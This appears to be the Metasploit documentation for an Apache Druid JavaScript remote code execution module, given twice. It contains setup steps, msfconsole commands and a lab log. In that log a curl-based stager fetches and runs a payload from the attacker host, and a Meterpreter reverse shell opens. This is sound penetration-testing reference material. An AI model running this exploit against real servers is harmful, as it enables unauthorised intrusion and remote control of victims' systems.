documentation/modules/exploit/linux/http/apache_druid_js_rce.md


## Vulnerable Application
Apache Druid
### Description

This module post json type request to Apache Druid with "config" is set to true, 
and execute command in "function" with Javascript to exploit.
But it seem that some payloads can't execute successfully and no reason,
such as cmd/unix/reverse_python


It has been fixed in Apache Druid 0.20.1

This module has been tested successfully against bebelow:

Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)

Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)

Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)

Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)

Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)

Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)

Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)

### Setup

Just use docker,but any other version you need to find by yourself

docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/apache_druid_js_rce`
1. Do: `set rhosts <ip>`
1. Do: `set lhost <ip>`
1. Do: `set lport/srvport <ip>` if necessary
1. Do: `run`
1. You should get a shell.

## Targets

### 0 (Linux Dropper)

This uses a Linux dropper to execute code.

### 1 (Unix Command)

This executes a Unix command.

## Options

### CHECKCMD

You can set a customize command to check and get command exec result respond.
Default is "id"


## Scenarios

### Apache Druid 0.20.0-iap4.1 on SaltStack Salt 3002.2 on Ubuntu 18.04 (Linux 4.19.112+)

```
msf6 > use exploit/linux/http/apache_druid_js_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_druid_js_rce) > set rhosts 10.100.70.2
rhosts => 10.100.70.2
msf6 exploit(linux/http/apache_druid_js_rce) > set rport 8888
rport => 8888
msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/apache_druid_js_rce) > options

Module options (exploit/linux/http/apache_druid_js_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHECKCMD  id               yes       The command to execute as checking vulnerability
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     8888             yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   VHOST                      no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.100.70.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (dropper)


msf6 exploit(linux/http/apache_druid_js_rce) > run

[*] Started reverse TCP handler on 10.100.70.1:4444
[*] Using URL: http://0.0.0.0:8080/NCId0EEi0G9
[*] Local IP: http://10.100.70.1:8080/NCId0EEi0G9
[*] Generated command stager: ["curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU"]
[*] Executing command /bin/bash`@~-c`@~curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU ......
[*] Client 10.100.70.2 (curl/7.58.0) requested /NCId0EEi0G9
[*] Sending payload to 10.100.70.2 (curl/7.58.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 10.100.70.2
[*] Meterpreter session 2 opened (10.100.70.1:4444 -> 10.100.70.2:59996) at 2021-03-31 10:56:03 +0800
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 10.100.70.2
OS           : Ubuntu 18.04 (Linux 4.19.112+)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

```
docs 2021-03-31 20:41:51 +08:00
			`## Vulnerable Application`
			`Apache Druid`
			`### Description`

			`This module post json type request to Apache Druid with "config" is set to true,`
			`and execute command in "function" with Javascript to exploit.`
			`But it seem that some payloads can't execute successfully and no reason,`
			`such as cmd/unix/reverse_python`


			`It has been fixed in Apache Druid 0.20.1`

			`This module has been tested successfully against bebelow:`

			`Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)`

			`Apache Druid 0.16.0-iap8 Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)`

			`Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)`

			`Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)`

			`Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)`

			`Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)`

			`Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)`

			`### Setup`

			`Just use docker,but any other version you need to find by yourself`

			`docker pull fokkodriesprong/docker-druid`
			`docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid`

			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use exploit/linux/http/apache_druid_js_rce`
			1. Do: `set rhosts <ip>`
			1. Do: `set lhost <ip>`
			1. Do: `set lport/srvport <ip>` if necessary
			1. Do: `run`
			`1. You should get a shell.`

			`## Targets`

			`### 0 (Linux Dropper)`

			`This uses a Linux dropper to execute code.`

			`### 1 (Unix Command)`

			`This executes a Unix command.`

			`## Options`

			`### CHECKCMD`

			`You can set a customize command to check and get command exec result respond.`
			`Default is "id"`


			`## Scenarios`

			`### Apache Druid 0.20.0-iap4.1 on SaltStack Salt 3002.2 on Ubuntu 18.04 (Linux 4.19.112+)`

			```
			`msf6 > use exploit/linux/http/apache_druid_js_rce`
			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
			`msf6 exploit(linux/http/apache_druid_js_rce) > set rhosts 10.100.70.2`
			`rhosts => 10.100.70.2`
			`msf6 exploit(linux/http/apache_druid_js_rce) > set rport 8888`
			`rport => 8888`
			`msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true`
			`verbose => true`
			`msf6 exploit(linux/http/apache_druid_js_rce) > options`

			`Module options (exploit/linux/http/apache_druid_js_rce):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`CHECKCMD id yes The command to execute as checking vulnerability`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS 10.100.70.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'`
			`RPORT 8888 yes The target port (TCP)`
			`SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.`
			`SRVPORT 8080 yes The local port to listen on.`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`SSLCert no Path to a custom SSL certificate (default is randomly generated)`
			`URIPATH no The URI to use for this exploit (default is random)`
			`VHOST no HTTP server virtual host`


			`Payload options (linux/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST 10.100.70.1 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Linux (dropper)`


			`msf6 exploit(linux/http/apache_druid_js_rce) > run`

			`[*] Started reverse TCP handler on 10.100.70.1:4444`
			`[*] Using URL: http://0.0.0.0:8080/NCId0EEi0G9`
			`[*] Local IP: http://10.100.70.1:8080/NCId0EEi0G9`
			`[*] Generated command stager: ["curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU"]`
			[*] Executing command /bin/bash`@~-c`@~curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU ......
			`[*] Client 10.100.70.2 (curl/7.58.0) requested /NCId0EEi0G9`
			`[*] Sending payload to 10.100.70.2 (curl/7.58.0)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3008420 bytes) to 10.100.70.2`
			`[*] Meterpreter session 2 opened (10.100.70.1:4444 -> 10.100.70.2:59996) at 2021-03-31 10:56:03 +0800`
			`[*] Command Stager progress - 100.00% done (119/119 bytes)`
			`[*] Server stopped.`

			`meterpreter > sysinfo`
			`Computer : 10.100.70.2`
			`OS : Ubuntu 18.04 (Linux 4.19.112+)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`

			```